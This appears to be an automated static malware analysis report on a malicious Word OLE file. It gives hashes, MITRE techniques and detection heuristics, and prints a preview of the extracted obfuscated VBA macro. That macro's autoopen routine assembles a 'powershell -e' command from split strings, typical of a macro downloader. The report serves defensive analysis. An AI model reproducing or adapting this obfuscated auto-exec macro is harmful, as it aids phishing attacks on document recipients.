Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 032bba8fc5b50e98…

MALICIOUS

Office (OLE)

Size: 253.0 KB
Created: 2019-03-14 14:54:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 2727a98e7b8c6a47f526b705a4e32779
SHA-1: 7e36782a32a37258dd84520644a9ac20383bfa5e
SHA-256: 032bba8fc5b50e983cf7dc3a026a6abc6bdcaf836a3db80201bceb8389131a1a
Risk score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The file is identified as malicious by ClamAV and exhibits high-severity heuristics indicating the presence of an AutoOpen VBA macro that uses GetObject for execution. The VBA script, while heavily obfuscated, is indicative of a macro-based downloader. The primary IOC is the VBA macro file itself, which is responsible for the malicious execution.

Heuristics 7

  • ClamAV: Doc.Malware.00536d-6895485-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6895485-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 66304 bytes
SHA-256: 5758746c64a0f3ed63d8578a442221aaab13861163a06087b74adcd7f6bfae8e

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "FAxXD4BD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function GwUGAABG()
   If TD4UAA = j4AQAx Then
         F_AxAXo = 878670844 * sAAC_C
         L_kAcQ = CX1AA4DA - 181214312 + 221536656 + bXZA1QUZ * 180519116 / 687684910 + 132413818 / Chr(217841140 / CSng(1193741 + Round(H1B_AxAA))) + 680533099 * Log(nAcAAAB) - 780563772 - 624672726 + UC_kQZDA * CLng(wAXBAAQ - Atn(AAAAQAZ / 260495655 / 932860114 + LBAAAox))
         cAAZwA_ = 790915169 * ZAxAxXw
End If
   If ooxAAD1o = q4BU4U Then
         zDQADA = 456215211 * FGAAkA_G
         NDGBDD = jc1CZUxD - 982058680 + 358093936 + icAkXXA * 638016230 / 695343707 + 365553849 / Chr(373861723 / CSng(45033617 + Round(CX1w_Aw))) + 486345786 * Log(jAXwAAAk) - 520272280 - 673643551 + hBGoAZ * CLng(fAZkDB - Atn(uAADkZAx / 23342439 / 507253531 + FAQQCQBU))
         jAwBAAA = 47553748 * hZw4UAA
End If
   If GAoZAcB1 = dCBAwAA Then
         HA1_DAAA = 244115750 * aAAA_UA
         zBAAQAA_ = N4ABAA - 850837021 + 758916303 + RCAkAB * 417758788 / 923399664 + 409414059 / Chr(341791202 / CSng(540506637 + Round(Pc1ADCQc))) + 851857874 * Log(vCQ44A) - 601172609 - 939937359 + XcZ4AUoU * CLng(cAB_BA - Atn(qxXZUXX / 292116923 / 79869350 + oA4AoB))
         qAAo4AA4 = 482107567 * A_wkkx
End If
   If kABAwAQ_ = kwoADC1D Then
         wBAAAQow = 936405630 * jUAUXQ
         pAAxDx = ax4Axk - 744414684 + 759194530 + pB_BQQ * 948190337 / 662594373 + 89247961 / Chr(516832080 / CSng(147418842 + Round(JUADAA))) + 829559119 * Log(MQDwDA) - 101437912 - 500729918 + sDCABCU4 * CLng(vGAABUCw - Atn(zxUQ4A / 485153839 / 323680750 + d4QA4DwC))
         wXAxkB_ = 324767836 * PoAoxBGX
End If
   If XAc__A = SAwXAAco Then
         cB11ZDxZ = 964236524 * FZ4QAD
         V1xAA14 = wD1UQG4 - 647787924 + 24892419 + uAc_ABAG * 623425248 / 641852651 + 819746046 / Chr(541826996 / CSng(365730362 + Round(iQAkco))) + 32609363 * Log(tQA1BxA) - 596013355 - 910027266 + w1Bo4AC * CLng(FQCXUDD4 - Atn(oooA4U / 109477167 / 944352017 + mwAAxkA))
         ZCC4A_ = 331997746 * fQA1GA
End If
   If ScAGUG = HAAxwA Then
         FAAAcZ_ = 387973253 * mAko41Dc
         YAAAkQ = MUBDUQ - 719411531 + 14933062 + QBZQBx * 914678392 / 419811049 + 947798651 / Chr(277527595 / CSng(24276994 + Round(NGBCQAD))) + 218292611 * Log(WAABDABA) - 594338895 - 437924250 + LQC_oAU * CLng(AXA4UB4 - Atn(mckcDD / 394891619 / 184788849 + TkAAZ4_))
         PxGQUZ = 411986600 * MGDcX_UX
End If
   If nQAUAxQA = jcCxXA_ Then
         HAABcw = 725844013 * BUBAQw
         OAQQQoxX = OADwDBA - 602813981 + 28932316 + IAx4AxoA * 297365008 / 420739234 + 721720619 / Chr(535178178 / CSng(359057486 + Round(NQ4AAAX))) + 760451191 * Log(DA1xcCXo) - 918334610 - 102343853 + HoBkkZA * CLng(lAA1AckA - Atn(UBABwBA1 / 476078241 / 521739967 + oxADUDA))
         koAA_oUX = 949579463 * hkACZ1A
End If
End Function
Sub autoopen()
On Error Resume Next
   If fZcw4A = B4o_Awx Then
         RowAo_ = 617247491 * lBAAxc
         dA_CcQ = C1kkG_X1 - 844660977 + 226248755 + AUADkD * 708766001 / 665048640 + 524023974 / Chr(130544852 / CSng(574714063 + Round(dGU_DD))) + 354267503 * Log(rAZCBA) - 676250459 - 745898670 + skwBADA4 * CLng(RAAwxDA_ - Atn(sQAUoAoX / 792457977 / 449087255 + DQxcAAAU))
         bccAUAA_ = 462045165 * PCDGQcDX
End If
   If BUDDAAC = OBAkAAox Then
         jZBUcxk = 50936532 * KB1_AAUc
         GA1AXCUU = GBAcooA - 296166490 + 96068600 + kADAUB * 690667603 / 376480914 + 83611013 / Chr(607967133 / CSng(903179462 + Round(OoXAXA1A))) + 59062418 * Log(SQABBAAo) - 285361478 - 701024696 + zQZDxAAB * CLng(RUxGkD - Atn(jADUDAAk / 518285541 / 357254851 + SxBAAQ))
         ODAUAAX4 = 559290022 * RBZxQ_A
End If
YG_AZXo (uAQGwB + "po" + wAAUDQ4Z + "wersh" + KcABAA + "ell -e " + ADBc4DBD + LAoQBQ + wU1AxcD + pkAoAx + XAxQCxUA + VoZAQUA + QCwCQw + sAAADDXG)
   If cDUwD1 = uU_xBA Then
         u11BAA = 969764910 * Kc
... (truncated)